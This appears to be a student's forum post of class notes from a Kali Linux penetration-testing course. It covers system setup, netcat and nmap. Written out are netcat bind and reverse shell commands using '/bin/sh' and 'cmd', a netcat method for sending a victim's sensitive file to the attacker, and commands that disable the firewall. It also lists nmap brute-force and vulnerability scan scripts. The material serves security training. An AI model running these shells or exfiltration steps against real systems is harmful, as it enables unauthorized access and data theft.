发帖
 找回密码
 立即注册
搜索
1 0

分享 第六课 kali基础应用

技术分享 1006 1 2025-3-15 01:29:05
本帖最后由 luosinian 于 2025-3-15 01:36 编辑

1. 课程内容概要(简要概括本次课程的主要内容,不需要太详细,但要能快速回忆起本节课的知识点)

主要知识点1:渗透专用系统简介
主要知识点2:kali优化
主要知识点3:netcat简介与使用

主要知识点4:nmap简介与使用


2.重点知识与细节(针对本节课的核心内容进行详细记录,包含公式、代码、重要原理等)
kali优化
更改镜像源: /etc/apt/sources.list
vi /etc/apt/sources.list
kali切换root⽤户: sudo su
更新软件数据库: sudo apt-get update
更新软件: sudo apt-get upgrade
设置语⾔包: sudo dpkg-reconfigure locales
修改缩放⽐率: hidp

netcat简介与使用
⽤途:⽹络⼯具 渗透⼯程师 ⼊侵到服务器

-h帮助信息
-isecs 延时的间隔
-l监听模式,用于入站连接
-L连接关闭后,仍然继续监听
-n指定数字的IP地址,不能域名服务器
-ofile 记录16进制的传输
-pport 本地端口号
-r随机本地及远程端口
-saddr 本地源地址
-t使用TELNET交互方式
-uUDP模式   
-v详细输出--用两个-v可得到更详细的内容
-wsecs timeout的时间
-z将输入输出关掉--用于扫描时


nc的基本使用方法
  1、实现连接通讯
  服务端 监听端口 Nc -lnvp 端口
  客户端 连接端口 nc ip 端口
  代表监听本地的端口输出结果不加域名

获取shell
1.正向shell(正向shell,必须先绑定监听后,对端再执⾏命令才可以连接上
让受害者开启 shell 之后,我们去主动连接这个 shell

Linux控制Windows
Windows绑定CMD到本地5566端⼝
nc -e cmd -lvp 5566
Linux主动连接⽬标5566
nc ip地址 5566

Windows 控制 Linux
Linux绑定SH到本地5566端⼝
nc -e /bin/sh -lvp 5566
Windows主动连接⽬标5566
nc ip地址 5566

Linux 控制 Linux
Linux受害者绑定SH到本地5566端⼝
nc -e /bin/sh -lvp 5566
Linux攻击者主动连接⽬标5566
nc ip地址 5566

Windows 控制Windows
Windows受害者绑定CMD到本地5566端⼝
nc -e cmd -lvp 5566
Windows攻击者主动连接⽬标5566
nc ip地址 5566

2.反向shell
正向:受害者开启监听之后,我们(攻击者)主动去找受害者
反向:我们(攻击者)开启监听,受害者主动来找我们区分正向和反向的最⼤区别就在于,是谁开启的监听
反弹shell⽣成: https://forum.ywhack.com/reverse-shell/



nc反弹:

必须攻击者先监听后,受害者才可以执⾏命令进⾏连接


控制Linux
攻击者等待5566连接
nc -lvvp 5566
受害者Linux绑定CMD到⽬标5566端⼝
nc -e /bin/sh ip地址 5566


控制Windows
攻击者等待5566连接
nc -lvvp 5566
受害者Windows绑定CMD到⽬标5566端⼝
nc -e cmd ip地址 5566




service firewalld status 查看防⽕墙状态
sudo systemctl stop firewalld 关闭防⽕墙
sudo systemctl start firewalld 开启防⽕墙
sudo systemctl disable firewalld 永久关闭


传输⽂件内容
受害者将⾃⼰本地的1.txt发送到攻击者的1.txt⾥⾯(有什么⽤?)包含敏感信息的⽂件我们直接发送回来
接收者⽂件存放名字可以随便写
攻击者(服务端;接收): nc -lvp 端⼝号 > 1.txt
受害者(客户端;发送): nc ip地址 端⼝号 < 1.txt
攻击者的⽂件名可以随便起,受害者这边必须得有这个⽂件才能发送正向:攻击者主动去连接受害者
受害者: nc -e /bin/sh -lvp 5566(linux)
nc -e cmd -lvp 5566(windows)攻击者: nc 受害者ip地址 端⼝


正向:攻击者主动去连接受害者
受害者: nc -e /bin/sh -lvp 5566(linux)
nc -e cmd -lvp 5566(windows)攻击者: nc 受害者ip地址 端⼝



反向:受害者主动来连接攻击者
攻击者: nc -lvvp 5566
受害者: nc -e /bin/sh 攻击者ip地址 端⼝nc -e cmd 攻击者ip地址 端⼝


反弹shell⽣成器
⽬标可能有各种不同的环境,可能是开发环境差异,也可能是操作系统差异,我们只要能够根据不同的差异去选择不同的反弹 shell 命令去操作就可以了。
https://forum.ywhack.com/reverse-shell/


端⼝&利⽤⼯具
端⼝讲解1-65535 端⼝范围端⼝占⽤
端⼝对应服务


nmap
https://zhuanlan.zhihu.com/p/585377081
nmap脚本扩展: https://wooyun.js.org/drops/nmap%E8%84%9A%E6%9C%AC%E4%BD%BF%E7%94%A8%E 6%80%BB%E7%BB%93.html



镜像源
中科⼤:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿⾥云:
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华⼤学:
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free


作业
一、对自己的kali系统进行优化
vi /etc/network/interfaces  配置静态IP
vi /etc/passwd               修改账号
/home/路径下 mv kali user     修改kali用户目录为新用户的家目录
passwd 新用户                 修改密码
vi /etc/sudoers              给新用户添加sudo
vi /etc/apt/sources.list      把国内源添加进去

更新软件数据库: sudo apt-get update
更新软件: sudo apt-get upgrade
vi /etc/ssh/ssh_config        配置ssh
systemctl enable ssh       开机启动ssh


二、实操nc正向shell,nc反弹shell,python反弹shell,bash反弹shell截图

三、使用nmap中的脚本扫描自己的局域网主机
nmap --script=auth 192.168.0.*
负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

nmap --script=brute 192.168.0.*
提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

nmap --script=default 192.168.0.* 或者 nmap -sC 192.168.0.*
默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

nmap --script=vuln 192.168.0.*   
检查是否存在常见漏洞

nmap -n -p445 --script=broadcast 192.168.0.12
在局域网内探查更多服务开启状况

nmap --script external 192.168.0.12  
利用第三方的数据库或资源,例如进行whois解析

由于扫描太慢,不进行截图了


四、结合自己的理解,说明什么是端口,什么是服务,它俩之间的联系是什么
端口分为两种:物理端口和逻辑端口
物理端口:硬件外设端口
逻辑端口:软件端口,范围0-65535,分为TCP和UDP两种
服务:在操作系统上的应用程序或进程,提供特定的功能


关系:端口用于标识和区分不同的服务,服务通过端口与客户端进行通信
















──── 0人觉得很赞 ────

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
2025-3-17 11:24:41
Windows与Windows之间,Linux和Linux之间的正向shell都差不多,不一一截图了,是个体力活
您需要登录后才可以回帖 立即登录
高级模式
返回